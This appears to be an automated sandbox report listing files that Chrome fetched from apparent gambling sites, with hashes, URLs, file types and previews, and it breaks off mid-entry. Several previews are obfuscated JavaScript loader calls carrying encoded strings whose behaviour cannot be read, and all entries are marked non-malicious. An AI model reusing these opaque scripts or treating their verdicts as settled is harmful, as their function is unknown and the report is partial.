                                                                                                                                                          SHA1:EB899D449F878B56FB85EBE7BE00538463A246DA
                                                                                                                                                          SHA-256:F8A6C9FA622734CBB4531D60BD5B7574A1F48E5C131C797F5626029416A1ECCA
                                                                                                                                                          SHA-512:DB1DBC6E631B6ABE943630DAEA67F4540465AEF9479839A2FDC5F1FF13ED288A3C98F9619253A7B7CCC03B686B23C92BF85C667A7AB3729FD3FAE99CD3E12574
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232148055.png
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3vahEriw3ILv8NsvmpzXG3YtZkZYMvLfdvoR+5/mMWPH+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkb9dSEODtsyEDONZhztvmlC4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj162WB1hMfXJUA8BuABo3lshuOSADgPtD/89s3XCk69+mPhNMUSYtc1e62Wqc/QkKdGw99UneI90erYCyD2Hn/ACISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNunXBUC3skW0M/g1mB0ijVD2O7FqvtgboJkfLJmLi2XrUwkGEVh2mLIIc/cEFD31KQ3L9XwNiNLrFz3z7TD5Ss5PWo8IeuvpSsIyA7tG9Pat1LZkBhT0TvPwMQpHBXk6z+gWACBFQWGBaAow1G1bniWU22rs2mOWOM3L3bDD+L0Tkx1SJuo/+AQ07yN1+7JYcQEyQH3q9zrhh8O20oNxcZpKyU27kcot6mw0vktfYZRaIuq8eoszUTdFarDB6S45P7qGcd5A6qZn2isQxOVUEaaLNYUX3RdouXHp0KC+ZnZtkvMmmk5owq3aXEFnYI8I/QUzXBaLIST/QyLF3OZ1+9IpQ431GTe/doH9HnEc3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):256
                                                                                                                                                          Entropy (8bit):5.444471506774003
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:4DAIUahKmKHByngOm/nkuN62Md37lGeoK/FgngTSRn:4chWJgO2nkv2MuYyngun
                                                                                                                                                          MD5:08E4CB17EDFC73469E982544E689CDF3
                                                                                                                                                          SHA1:350A72268459F3BDDFBE2892A67F5CCC7F1DF613
                                                                                                                                                          SHA-256:06B61B8783CCB258868D089739FE74D39214D6770CF46BDA83F445FA64DA348E
                                                                                                                                                          SHA-512:09B14BA53D1F779BA25AEE4A2676D85186F9400490AF6CDECC831AB4771E033D88D7195ECD395D0E1ABE6990BABD303B7FCDB9F6A251CEDCD613CA4BAB572B5D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4091-mobile-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAFgDYAOAXQBoBvAIlwFU6BJagLgDMBXNGAFwEt0mEOR7koAShockIAARIeAJz69qAbgDyYAFYheAOgAmINnzQgACopQQQingE9Mo6gH1XIJAFkUhjgBsQaioANyh/DhAWAEIABgBfcREjEygAngBeSlh+EKjqAAkAVmCBJDoAJQAZFmpgqDRDaz5DSpq68gUHQNrgtCgQlmxSeNHxNSA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37334
                                                                                                                                                          Entropy (8bit):7.99025789795152
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:rmIQtPchYC5wNDlWn/EQl3bl31gWByUn5S4IHFu1XIuoWZ:rotO1fn8C3J3yqnZ6FEXIuR
                                                                                                                                                          MD5:5AC2B03BE99D33F2E526E1C551B24F75
                                                                                                                                                          SHA1:0391F9FD97C3798931020AF2EB6ABD9881675A5E
                                                                                                                                                          SHA-256:A4DAE354990486E357F25166FBAB35815B5FB19635BD256AD4FFDCA1EC3083AB
                                                                                                                                                          SHA-512:359C4D744DBABAEC5944E50D434A31360AF4B987AD69E62C68640EA11C288A3CA1CF5327E0DF31945C094DC83A6427B0E0BB19C8F87A0E08909482E70276B243
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/card/lg_img.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" xmpMM:DocumentID="xmp.did:3F730347459011EABC77EC84855C7F07"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730344459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730345459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.p.....FIDATx..}......3...{.W`.HWP.{.{..G..I4.X.j.%j....A...E..uwY`a{owo/S...,...E../.~.{..3s.y..>o9.p...x.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4759), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4759
                                                                                                                                                          Entropy (8bit):5.476859656537734
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VfAAO3OQLNnQlA3uiPETnARwqehYoNA3kjS:JA13OQBnQlA37KnARcYoNAUjS
                                                                                                                                                          MD5:869D57625CB27AC18854F58AF5F9013D
                                                                                                                                                          SHA1:C5EB5DEC7EA27C83321CBC9653816A1CE69B1490
                                                                                                                                                          SHA-256:F851AAF56CB4C36D1240CBAD57E13E4FFF28D32D1A356DFC089D31E14C0BF87E
                                                                                                                                                          SHA-512:B62B9A8D04081165BA9DEB99BD6774E9C7DC583BC08DFB22BCEAA143D485462C81F7D9F2FE5161007BA2BF16F7F269CA2E22BA8263BC504C60818E49A88DBB01
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/msites/themes/default/login.css
                                                                                                                                                          Preview:body.login{background-image:url(../../images/login-bg.jpg);background-position:center center;background-repeat:no-repeat;background-attachment:fixed;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover}.login-logo{margin:0 auto;color:#fff;font-size:60px;width:450px;text-align:center;padding-bottom:15px;padding-top:10vh;text-shadow:0 3px 3px rgba(0,0,0,0.2)}.login-bl{background:rgba(255,255,255,0.8);width:450px;margin:0 auto;padding:20px 20px 10px 20px;border-radius:3px}.real-name-b{background:rgba(255,255,255,0.8);width:550px;margin:0 auto;padding:20px;border-radius:3px}.real-name-b .center{margin-left:128px}._btn{width:128px}.real-name-b .tip-b{border:1px solid #e89137;border-radius:3px;padding:10px;color:#e87e25;text-align:center}.verify-img img{height:40px;margin:0 5px;border-radius:3px}.tip_container{text-align:center;line-height:40px;margin-top:10px;font-size:16px;width:100%;display:block}.set-new-name-t{margin-top:8px;text-align:
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3392), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3392
                                                                                                                                                          Entropy (8bit):5.9764765144410665
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:HNItS/CA+c6HZJ14tsii1w5hSDQ0ZdGA4QpD91O0hv5F3lYZ/jn9rMkDxDxDxDxj:3//N6/KLb5hpaUA4YDW0jF3WFj9rve+
                                                                                                                                                          MD5:24B4D63BEB3D3745908C5FDE8D480453
                                                                                                                                                          SHA1:78BD995129A720D67F1F6EA5658409484E849B4D
                                                                                                                                                          SHA-256:28E01E2E6CD0E941DDBCFA49C463CD5235BC8746DFA0048BFBBE6CD2031B230B
                                                                                                                                                          SHA-512:0FB3D35AAB08E4CDF351DE001D2F8627364971D2ECB24675A41E00A961A75F51A4FCD211D18889D91154E3EFC74FB6470F351C7BC78FF69E577151C507CA8292
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g2by+7vtabaa2OBRKrAR9liZMmMF0oh762Gd0BApJfRrgT7wPYLNtV4/9FBozcAx6syoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramKodNoHlkGPGNS5T0jFMSBD6z68LrrwO2flo3B+D7GwlbtYXP42+1IRuEJKIdW137/se9qtv8SpehS8sDI3PMhhOjiaLb3FraTmbpctNvwkCCkQesDdjqkjku9k9lV3icAnreKg9CkWQz56iMwORgEnui2K27nVSMvYAJW5mlQsOfkh5VEx6p6VCIaL+KHT4HB/T/bCyF5HpjDQdPBniuBm8ygoNy52eQmzLua6igJIwOUDAmwSN39dg3m33BOspmTUgrrP/srUnpNmZQjmoNOi2Q6pODrxvQV3vvMMtlk1liyJ0k90OnrmcTf0P/5nKEF1znckPsZ7D8d1Z74pAd22TXcG8YU/a3/bjF+MlxNsixcNtjPn1SIpcwtABAji20KVFh1NV5/NM0CzKeFFEIb/uuqShJJHdvExaAxLevBgpXtitjq1obMf5n0QXCjilMNlNtq7NpjljjNy92ww/i9E5MdUibqP/gENO8jdfuyWHEBMkB96vc64YfDttKDcXGaSslNu5HKLepsNL5LX2GUW4CN4g/wYFhXfNI9/WRknle6hnHeQOqmZ9orEMTlVBGmizWFF90XaLlx6dCgvmZ2bZLzJppOaMKt2lxBZ2CPCP9bamcESkapnRUMqby69eFyapaQ84MJ+PWhkg0MiFm8ClvWyFpf4wHom8i3bEbfPtX3tqeOFZET70VM+wChTa4OUjyYUz5i/y9Z+lYucJKV3jiLVUMLuBGVVxB7nvZuCa1l8YKC2E7KmcDZyZazn
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/sunbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):38319
                                                                                                                                                          Entropy (8bit):7.98829766158214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:3SZEC9vs4Bg5+AGhzNkQogZikROFc/HMgcektZlb+G6qY44:31kvs/TGhZqmdUXY44
                                                                                                                                                          MD5:73349E76BD1179B0367B68C73D387C31
                                                                                                                                                          SHA1:2CB4C731A8DB75070534D2F2F64596915CC37222
                                                                                                                                                          SHA-256:8B2BE9576117E0E0360735DDC90BC813DCA4F78C9DAD4D63FB0CDAA00D00B787
                                                                                                                                                          SHA-512:B02038F50D3862A47D8187D8C95F593CE68472755D4DCEEC7D9E0B0016229884B4E5C3A6885DF5E82879987B8BE1D376E4DBC054DC4064A44B0E0BBBCBABEF76
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:48FCB966459011EABF68CCFBF3C626E4" xmpMM:DocumentID="xmp.did:48FCB967459011EABF68CCFBF3C626E4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48FCB964459011EABF68CCFBF3C626E4" stRef:documentID="xmp.did:48FCB965459011EABF68CCFBF3C626E4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.?......IDATx...|TU.>..6.O&........JPP.+(b/(.....k].....(..A.H.-...I.....93..+...{.9.........^...7.x..I.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1528
                                                                                                                                                          Entropy (8bit):7.81371567773462
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:6Jn6h/+4UkSCEhCV79H09qlb/F7JbTDpA7gZSDVQavTGcANjSoq8OFxkzGNuEL:3/7UkChCrHEQF7lT9AEZkVQayLBbq8OT
                                                                                                                                                          MD5:F9FDB5671BFBB1B3332A9F8D0D2CE972
                                                                                                                                                          SHA1:627C5272D0D56DED24B23507C5F13D1B9DB5EC20
                                                                                                                                                          SHA-256:FC9360526F1F73906DB6F4880464173C4E124FE9770FAA0468D91B73AB8387E6
                                                                                                                                                          SHA-512:829718CC2154BF3759B28F55B7A9506C3DE3C1C4C51D4AEA5BCAA594762BC7DBDD1BF509F8256A81644623E277A020B5029A98407A916A032D57C759DF60970C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_ky.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...UJ?~H/PH>NNNzJ,.S1.`vV3@:6TSTueNIMP...~O..l%pX<pP..h.j~rX.L*.\..N.........X..viE.H.{?..y.T..S..JtU)....f.{=...c0.G.l..j.e?ziH.wE.g6._:..W`K5..P.Z6..f^O?n\<.~@vn[B==.X.o}F+:6/.._.........c.<^...G...V.4.k..W..u.u.."..r\.z1Z3...<..c.Q.G._.T ......j@..5.yL[PB.v:..Qr...AMG;.\.xW...c/u.hcO7..Z..N.x:a8......u.....n..n..a.~.......................-..b/.x#.j..Q..Z..........`.........W..6..%. ...|K.a7.v;....|............t........b.qy...Ri..T....M.....?.........z.}u:fq..m.f..^.Q.oAvW6jM-.*.m........t..z..W.M+....n7.x*.............<.......^..h.....................l..P..K...u.~...i...dx...........M^..c......................{Z|v..r..n.b~dX.W.`U..Q.iQIAP.E.wA.{@.k@.N@.)>.C6..2{G(eE...K<.....C..j..X..=......A)...ttRNS...%..>..]D&.......l_M+...............................kj_[VIH6/-................................................XB/U._....9IDAT(.b.&`.a.R.,..<..........5.\...9.|..X.s..m.k_..U..tq...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35006
                                                                                                                                                          Entropy (8bit):7.988856498745553
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hxYhXRTapcP6CpEEc0s7F0LJmFsQjJC5tVhjExqHYXqa0uL:hxYxRTapK/gStmFhNCZtExilnuL
                                                                                                                                                          MD5:BE847DE8F29881F43BE55C96B76367F3
                                                                                                                                                          SHA1:2A09A9BF7796E4478ED03B52A77888027BFECAC2
                                                                                                                                                          SHA-256:98A61CBB24F9FFE09A3CE437568ADBDE4B5075651A8576A135B8ECA6AB83C873
                                                                                                                                                          SHA-512:34F031EBB5DF4A511AE209BA7CDD4EF66AD45213D34064A711DC24F8E1BA22FA10165AF47EF85315DB13FF1C9F261EBC4836591A5E49A893102F8D477FD947B8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:DE3F311493A511ECAF9BE04F90169D49" xmpMM:InstanceID="xmp.iid:DE3F311393A511ECAF9BE04F90169D49" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730347459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..:S...,IDATx...|TU.>..-.k&....@B.A..QQ..^VT....V..EWWW].........'.H(!.gz.......E@.....|.3..s.9.y..y.{....o...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/cc.png?r=1707849192
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/cc.png?r=8267241753
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (408), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):408
                                                                                                                                                          Entropy (8bit):5.573435584354822
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:4DAIUahdn9fW34ngZuiKteHgq5l4tQwKxxHBV91VZ05sWXuwuIr/O0YIkU1tCWsg:4chWl2OtehlS+hV9udewuPK/VhUzU/aM
                                                                                                                                                          MD5:9C2E0303CF8AD99F448FC5759A2C2B5B
                                                                                                                                                          SHA1:9E6666D1DF1D46409FAF55753B0BFCBC44B5C31E
                                                                                                                                                          SHA-256:FFDDE66755DA36DFE7C77ADAB1DEE09ABEB21633D13CC703D918F5BEEB4C6914
                                                                                                                                                          SHA-512:AF70344322D5824309D748CFBED5B572FF88C400ED0AF44D5C89263A2C5C479FA57B12DF431091ABF392471C9AE289113069CF16E8200F76C1F983FD9C44440C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4044-slides-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAVgDYAOAXQBoBvABQHY1iAuAMwFc0YAXAS3UxHKdyaAJSUARKyQgABEk4Anbl3EBuAPJgAViC4A6ACYhm3NCGoKUEEAs4BPTEPEB9ZyCQBZFAdYAbEOJUAG5QvqwgjACEAAwAviLCho7k4ki+3EZIgWwcPHxiCiCcrApoMtzxqiEK5QC8lPbWjABM5DC+UABenYziaCgAtArABoGNIAAy3PKM2JTAGZwAFoy4AJzN0eRLINwA5kucjPgAzPjCUEH7UHloUVsQHXaMlLA8QRGRuORQrJwo93Ipk4NhCvkYABYQCdyEhgFAIIDoFIQOo0AAJFAfBT3WLCEAAD04AEE0AYLCArigpFFcLFSLFGSJVEA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1380), with no line terminators
                                                                                                                                                          Category:downloaded
